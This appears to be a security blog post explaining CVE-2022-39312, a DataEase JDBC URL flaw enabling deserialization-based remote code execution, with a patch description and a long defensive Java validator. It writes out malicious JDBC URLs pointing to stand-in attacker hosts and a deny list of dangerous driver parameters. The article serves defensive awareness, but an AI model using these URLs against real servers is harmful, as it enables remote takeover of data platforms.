DataEase is an open source data visualization and analysis platform widely used for exploring and sharing data insights. If your organization uses DataEase and hasn’t upgraded to version 1.15.2 or later, you need to pay attention to CVE-2022-39312. This vulnerability allows attackers to execute system-level commands with just a crafted JDBC connection string pointing at a malicious MySQL server.

This post breaks down CVE-2022-39312 in simple language, shows how the vulnerability works with code samples, links to original sources, and explains how it can be exploited.

The issue sits in the handling of JDBC parameters for MySQL data sources.

- Attackers can add dangerous parameters to the JDBC URL and connect DataEase to a malicious MySQL server.
- Through a known MySQL JDBC driver flaw, this can lead to Java deserialization attacks.
- Successful exploitation means remote code execution (RCE): in other words, attackers could run their own commands on your server.

The flaw is in the file

backend/src/main/java/io/dataease/provider/datasource/JdbcProvider.java

The Problem

DataEase lets users create and customize data sources, including writing JDBC URLs for MySQL. But it does not filter or sanitize the JDBC parameters users provide. This means an attacker with access to the data source form can sneak in the extra parameters needed for an exploit.

Here’s a simplified snippet of how DataEase processes a new data source (note the missing validation of the URL):

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;

public class MysqlConfiguration extends JdbcProvider {
    public Connection getConnection(String url, String user, String password) throws SQLException {
        // url is taken from user input and passed straight to the driver:
        // no parsing, no allow list, no rejection of driver options
        return DriverManager.getConnection(url, user, password);
    }
}
```

Notice: url (the JDBC string) is used with no sanitization, so anything in it is processed by the MySQL JDBC driver.

Craft Malicious MySQL Server:

The attacker sets up a malicious MySQL server that speaks the protocol and triggers deserialization on connect.

Send Dangerous JDBC URL:

The attacker submits a new DataEase data source using a JDBC URL with parameters designed to trigger deserialization:

jdbc:mysql://attacker-server:3306/payload_db?autoDeserialize=true&queryInterceptors=...

Trigger Deserialization:

On connection, the Java MySQL JDBC client fetches serialized data from the attacker’s server and deserializes it *unsafely*.

Arbitrary Code Execution:

If correct gadget chains are present, the attacker’s payload is executed on the DataEase server—this could open a reverse shell, download malware, or anything else.

A minimal example in pseudocode, for illustration purposes only:

```java
// Step 1: Attacker crafts a JDBC URL with deserialization enabled
String url = "jdbc:mysql://evil-attacker-server:3306/fake_db?autoDeserialize=true&queryInterceptors=com.attacker.MyInterceptor";

// Step 2: DataEase admin adds this as a new data source
dataease.addDataSource("malicious-mysql", url, "user", "pass");

// Step 3: DataEase server connects, triggering the attack
Connection conn = DriverManager.getConnection(url, "user", "pass"); // Remote code execution here!
```

Note: In practice, attackers use known gadget chains and special MySQL servers (such as ysoserial’s MySQL payloads).

Patch and Fix

The DataEase team fixed this in version 1.15.2. The patch filters JDBC parameters and now blocks dangerous ones like autoDeserialize, loadBalance, and queryInterceptors. You can see details in their GitHub advisory.
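As an added example (not code from DataEase or from its patch), here is what a parameter check of the kind described above could look like in Java, placed in front of `DriverManager.getConnection` in a class like the `JdbcProvider` snippet shown earlier. The class name `JdbcUrlValidator`, its method names and the sample URLs in `main` are assumptions made for this illustration. The blocked-name list takes the three parameters named in the fix description and adds `statementInterceptors` and `allowLoadLocalInfile`, two other Connector/J options I would not let a user set. Beyond the plain query string, the check normalizes names (case, whitespace, repeated percent-decoding), inspects Connector/J's `address=(key=value)` host form, which can also carry connection properties, and rejects the `loadbalance`/`replication` URL variants outright.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Locale;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Example deny-list check for user-supplied MySQL JDBC URLs (illustration; not DataEase's patch). */
public final class JdbcUrlValidator {

    // Parameters named in the DataEase fix description, plus two Connector/J
    // options added here as an assumption about what a fuller deny list contains.
    private static final Set<String> BLOCKED = Set.of(
            "autodeserialize", "loadbalance", "queryinterceptors",
            "statementinterceptors", "allowloadlocalinfile");

    // Only the plain scheme is accepted; jdbc:mysql:loadbalance:// and
    // jdbc:mysql:replication:// are refused without further parsing.
    private static final String PLAIN_SCHEME = "jdbc:mysql://";

    // Connector/J's "address=(key=value)(key=value)" host syntax can set
    // connection properties too, so keys inside parentheses are inspected as well.
    private static final Pattern ADDRESS_PROPERTY =
            Pattern.compile("\\(\\s*([^=()]+?)\\s*=[^()]*\\)");

    private JdbcUrlValidator() {}

    /** Returns the blocked names found in the URL; an empty list means the URL passes. */
    public static List<String> findBlockedParameters(String jdbcUrl) {
        List<String> hits = new ArrayList<>();
        if (jdbcUrl == null) {
            hits.add("<null url>");
            return hits;
        }
        String url = jdbcUrl.trim();
        if (!url.toLowerCase(Locale.ROOT).startsWith(PLAIN_SCHEME)) {
            hits.add("<unsupported scheme>");
            return hits;
        }
        String rest = url.substring(PLAIN_SCHEME.length());
        int q = rest.indexOf('?');
        String authorityAndPath = q < 0 ? rest : rest.substring(0, q);
        String query = q < 0 ? "" : rest.substring(q + 1);

        // Host section: scan any (key=value) groups of the address= form.
        int slash = authorityAndPath.indexOf('/');
        String hosts = slash < 0 ? authorityAndPath : authorityAndPath.substring(0, slash);
        Matcher m = ADDRESS_PROPERTY.matcher(hosts);
        while (m.find()) {
            checkName(m.group(1), hits);
        }

        // Query section: Connector/J separates properties with '&'.
        if (!query.isEmpty()) {
            for (String pair : query.split("&")) {
                int eq = pair.indexOf('=');
                checkName(eq < 0 ? pair : pair.substring(0, eq), hits);
            }
        }
        return hits;
    }

    public static boolean isSafe(String jdbcUrl) {
        return findBlockedParameters(jdbcUrl).isEmpty();
    }

    private static void checkName(String rawName, List<String> hits) {
        String name = normalize(rawName);
        if (name == null) {            // undecodable name: fail closed
            hits.add("<malformed parameter: " + rawName + ">");
        } else if (BLOCKED.contains(name)) {
            hits.add(name);
        }
    }

    /** Trims, percent-decodes until stable (max 3 rounds), strips whitespace and lower-cases. */
    private static String normalize(String rawName) {
        String s = rawName.trim();
        try {
            for (int i = 0; i < 3; i++) {
                String decoded = URLDecoder.decode(s, StandardCharsets.UTF_8);
                if (decoded.equals(s)) break;
                s = decoded;
            }
        } catch (IllegalArgumentException e) {
            return null;
        }
        return s.replaceAll("\\s", "").toLowerCase(Locale.ROOT);
    }

    public static void main(String[] args) {
        // Constructed sample URLs for demonstration only.
        String[] samples = {
            "jdbc:mysql://db.internal:3306/sales?useSSL=true&serverTimezone=UTC",
            "jdbc:mysql://attacker-server:3306/payload_db?autoDeserialize=true&queryInterceptors=com.attacker.MyInterceptor",
            "jdbc:mysql://h:3306/d?AUTO%44eserialize=true",
            "jdbc:mysql://address=(host=h)(port=3306)(autoDeserialize=true)/d",
            "jdbc:mysql:loadbalance://h1,h2/d"
        };
        for (String s : samples) {
            System.out.println((isSafe(s) ? "ACCEPT " : "REJECT ") + s + " " + findBlockedParameters(s));
        }
    }
}
```

Running `main` accepts only the first sample and rejects the other four, including the percent-encoded spelling and the `address=()` form. A deny list like this is a stopgap: an allow list of the handful of parameters your deployment actually needs is the stronger design, and whichever you choose, the check belongs server-side where the data source is saved, not only in the browser form.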

Upgrade immediately if you haven’t:  
Download latest DataEase releases

Attack Demo and References

- Original CVE Details - nvd.nist.gov
- GitHub Security Advisory
- Blog post: JDBC Deserialization Attacks by orange-sys
- MySQL Fake Server for RCE Exploits
- ysoserial Java Deserialization gadgets

Summary

CVE-2022-39312 is a perfect demonstration that allowing user-controlled connection strings is dangerous, especially when the underlying libraries have known deserialization weaknesses. Attackers can own your DataEase server with just a crafted JDBC URL unless you upgrade to version 1.15.2 or later.

Follow best practices for supply chain security

Stay safe and always keep your open source software up to date!

Timeline

Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:24:00 UTC